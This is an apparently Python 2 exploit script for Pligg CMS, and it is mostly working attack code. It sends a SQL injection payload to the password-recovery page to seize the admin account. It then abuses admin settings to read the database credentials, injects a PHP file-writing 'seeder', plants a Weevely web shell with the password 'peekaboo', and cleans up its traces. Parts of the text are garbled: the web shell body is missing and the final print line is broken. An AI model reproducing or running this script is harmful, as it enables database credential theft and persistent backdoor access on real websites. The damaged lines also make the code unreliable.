import urllib, urllib2, base64, re
from time import sleep
from sys import argv
from cookielib import CookieJar
print
if len (argv) < = 3 : exit()
port = 80
target = argv[ 1 ]
path = argv[ 2 ]
uname = argv[ 3 ]
cj = CookieJar()
opener = urllib2.build_opener(urllib2.HTTPCookieProcessor(cj))
formdata = { "reg_password" : "random" ,
"reg_password2" : "random" ,
"n" : "123" ,
"processrecover" : "1" ,
"id" : base64.b64encode(b "mrcongiuntivo' UNION SELECT 1,(SELECT user_login FROM pligg_users WHERE user_level='admin' LIMIT 1),3,4,5,6,'sodoma@mailinator.com',8,9,0,1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8 UNION SELECT 1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8 FROM pligg_users WHERE user_login = 'warum" )
}
data_encoded = urllib.urlencode(formdata)
print "[+] Sending the reset password request for user " + uname
response = opener. open ( "http://" + target + path + "recover.php" , data_encoded)
content = response.read()
print "[+] Heading to admin panel and activating anti-spam"
response = opener. open ( "http://" + target + path + "admin/admin_config.php?action=save&var_id=12&var_value=true" )
content = response.read()
print "[+] Setting a new blacklist file"
response = opener. open ( "http://" + target + path + "admin/admin_config.php?action=save&var_id=14&var_value=libs/dbconnect.php" )
content = response.read()
print "[+] Retrieving DB connection details"
response = opener. open ( "http://" + target + path + "admin/domain_management.php" )
content = response.read()
regex = re. compile ( "define\(\"([A-Z_]+?)\", '(.*?)'\)" )
print regex.findall(content)
print "[+] Preparing dbconnection.php for shell injection.."
response = opener. open ( "http://" + target + path + "admin/domain_management.php?id=0&list=blacklist&remove=?%3E" )
content = response.read()
print "[+] Time for some shell planting, preparing file_put_contents.."
seed = "IF(ISSET($_GET[WHR])){FILE_PUT_CONTENTS(STRIPSLASHES($_GET[WHR]),STRIPSLASHES($_GET[WHT]), FILE_APPEND);}CHMOD($_GET[WHR],0777);"
response = opener. open ( "http://" + target + path + "admin/domain_management.php?id=&doblacklist=" + seed)
content = response.read()
print "[+] Injecting weevely.php [ https://github.com/epinna/Weevely/ ] with pwd: peekaboo"
weevely =
for wl in weevely.splitlines():
formdata = { "WHR" : "weevely.php" ,
"WHT" : wl
}
data_encoded = urllib.urlencode(formdata)
response = opener. open ( "http://" + target + path + "admin/admin_delete_comments.php?" + data_encoded)
content = response.read()
sleep( 4 )
print "[+] Cleaning up the seeder.."
response = opener. open ( "http://" + target + path + "admin/domain_management.php?id=0&list=blacklist&remove=" + seed)
content = response.read()
print "[+] Resetting the blacklist file.."
response = opener. open ( "http://" + target + path + "admin/admin_config.php?action=save&var_id=14&var_value=logs/domain-blacklist.log" )
content = response.read()
print
+ host + path +
|